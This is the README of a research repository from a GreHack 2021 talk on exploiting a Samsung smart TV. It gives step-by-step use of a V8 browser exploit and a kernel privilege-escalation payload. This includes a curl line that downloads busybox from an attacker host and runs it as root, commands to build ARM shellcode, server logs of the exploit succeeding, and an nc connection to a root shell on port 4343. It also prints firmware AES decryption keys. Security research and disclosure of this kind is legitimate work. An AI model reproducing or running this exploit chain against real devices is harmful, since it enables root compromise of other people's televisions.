Exploit and firmware decryption script presented at Grehack 2021. Slides are available inside the slides. directory and the replay video on Youtube.
This repository contains three directories:
exploit/: containing the v8 exploit and the kernel exploit,firmware/: containing the script for firmware decryptionslides/: contining the presentation that was given at grehack about this work
First, you have to change the attacker IP inside payload.c:
char cmd_busybox[] = "/usr/bin/curl http://192.168.1.37:5000/static/busybox -o /tmp/busybox\x00";
exec_as_root(cmd_busybox, sizeof(cmd_busybox));Compile the LPE payload and copy the generated javascript file inside the static/ directory :
$ make -C payload/
arm-linux-gnueabi-gcc -fPIC -fPIE -nostdlib -fno-builtin -Os -Wall -c -o entry.o entry.S
arm-linux-gnueabi-gcc -fPIC -fPIE -nostdlib -fno-builtin -Os -Wall -c -o payload.o payload.c
arm-linux-gnueabi-ld -T function_order.ld -o payload.elf entry.o payload.o function_order.ld
objcopy -O binary payload.elf payload.bin
echo "let shellcode = [" > payload.js
xxd -i payload.bin | tail -n +2 | head -n -2 >> payload.js
echo "];" >> payload.js
$ cp payload/payload.js static/shellcode.jsRun the Flask app and open the webpage inside the TV's browser:
$ ./run.sh
* Serving Flask app "app.py" (lazy loading)
* Environment: production
WARNING: This is a development server. Do not use it in a production deployment.
Use a production WSGI server instead.
* Debug mode: on
* Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
* Restarting with stat
* Debugger is active!
192.168.1.36 - - [12/Apr/2021 17:27:38] "GET / HTTP/1.1" 200 -
192.168.1.36 - - [12/Apr/2021 17:27:38] "GET /static/exploit.js HTTP/1.1" 200 -
192.168.1.36 - - [12/Apr/2021 17:27:38] "GET /static/shellcode.js HTTP/1.1" 200 -
[2021-04-12 17:27:38,483] INFO in app: 2021-04-12T15:27:17.467Z: Let's go !
192.168.1.36 - - [12/Apr/2021 17:27:38] "GET /log?str=2021-04-12T15:27:17.467Z:%20Let%27s%20go%20! HTTP/1.1" 200 -
...
[2021-04-12 17:27:38,984] INFO in app: 2021-04-12T15:27:17.979Z: ok !
192.168.1.36 - - [12/Apr/2021 17:27:38] "GET /log?str=2021-04-12T15:27:17.979Z:%20ok%20! HTTP/1.1" 200 -
192.168.1.36 - - [12/Apr/2021 17:27:39] "GET /static/busybox HTTP/1.1" 200 -You should have a root shell on port 4343 :
$ nc 192.168.1.36 4343 -vvv
(UNKNOWN) [192.168.1.36] 4343 (?) open
id
uid=0(root) gid=0(root) context="_"Download firmware from : https://www.samsung.com/us/support/downloads/?model=N0002201&modelCode=QN43Q60TBFXZA
Unzip:
$ unzip T-NKLAKUC_2201.0.zip
Archive: T-NKLAKUC_2201.0.zip
inflating: T-NKLAKUC/image/upgrade.msd
inflating: T-NKLAKUC/image/info.txtDecrypt it:
$ python3 firmware/decrypt.py T-NKLAKUC/image/upgrade.msd /tmp/decrypted/
[+] aes_key = 5bab1098dab48792619ebd63650d929f
[+] aes_iv = 142610ca2fb201fd78ad8faf328bc883
...
[+] section 1, offset = 0x108c, size = 0x4c010
[+] first block = 8137962a88ef836b74f9cdda78a1747b
...
[+] last block = 10101010101010101010101010101010
/tmp/decrypted/ddr.init
[+] writing in /tmp/decrypted/ddr.init
[+] section 2, offset = 0x4d09c, size = 0x2fe010
[+] first block = 0f30a0e1000052e30500000a083043e2
...
[+] last block = 10101010101010101010101010101010
/tmp/decrypted/seret.bin
[+] writing in /tmp/decrypted/seret.bin
[+] section 3, offset = 0x34b0ac, size = 0x6b5010
[+] first block = 27051956bab5bfb361e80e7a006b4ec0
...
[+] last block = 10101010101010101010101010101010
/tmp/decrypted/uImage
[+] writing in /tmp/decrypted/uImage
[+] section 4, offset = 0xa000bc, size = 0x17e010
[+] first block = d00dfeed0000be82000000380000aabc
...
[+] last block = 10101010101010101010101010101010
/tmp/decrypted/dtb.bin
[+] writing in /tmp/decrypted/dtb.bin
[+] section 5, offset = 0xb7e0cc, size = 0x410
[+] first block = 00000000000000000000000000000000
...
[+] last block = 10101010101010101010101010101010
/tmp/decrypted/sign.bin
[+] writing in /tmp/decrypted/sign.bin
[+] section 6, offset = 0xb7e4dc, size = 0x3fe010
[+] first block = bdf2fdf7c10a6e894df26d830fc20f7a
...
[+] last block = 10101010101010101010101010101010
/tmp/decrypted/secos.bin
[+] writing in /tmp/decrypted/secos.bin
[+] section 7, offset = 0xf7c4ec, size = 0xfe010
[+] first block = 3abd6e7e0ab706ac9a2f5163515d1364
...
[+] last block = 10101010101010101010101010101010
/tmp/decrypted/secos_drv.bin
[+] writing in /tmp/decrypted/secos_drv.bin
[+] section 8, offset = 0x107a4fc, size = 0x4bc0e010
[+] first block = 56444653323030376d6b66732e766466
...
[+] last block = 10101010101010101010101010101010
/tmp/decrypted/platform.img
[+] writing in /tmp/decrypted/platform.img
[+] section 9, offset = 0x4cc8850c, size = 0x2f0010
[+] first block = 68737173cd040000f74ae86100000200
...
[+] last block = 10101010101010101010101010101010
/tmp/decrypted/factory_peq.img
[+] writing in /tmp/decrypted/factory_peq.img$ file /tmp/decrypted/*
/tmp/decrypted/ddr.init: data
/tmp/decrypted/dtb.bin: Device Tree Blob version 17, size=48770, boot CPU=0, string block size=5062, DT structure block size=43652
/tmp/decrypted/factory_peq.img: Squashfs filesystem, little endian, version 4.0, zlib compressed, 3034483 bytes, 1229 inodes, blocksize: 131072 bytes, created: Wed Jan 19 17:31:35 2022
/tmp/decrypted/platform.img: data
/tmp/decrypted/secos.bin: data
/tmp/decrypted/secos_drv.bin: data
/tmp/decrypted/seret.bin: data
/tmp/decrypted/sign.bin: data
/tmp/decrypted/uImage: u-boot legacy uImage, Linux-4.1.10, Linux/ARM, OS Kernel Image (Not compressed), 7032512 bytes, Wed Jan 19 13:13:30 2022, Load Address: 0x80008000, Entry Point: 0x80008000, Header CRC: 0xBAB5BFB3, Data CRC: 0x1FD62A2B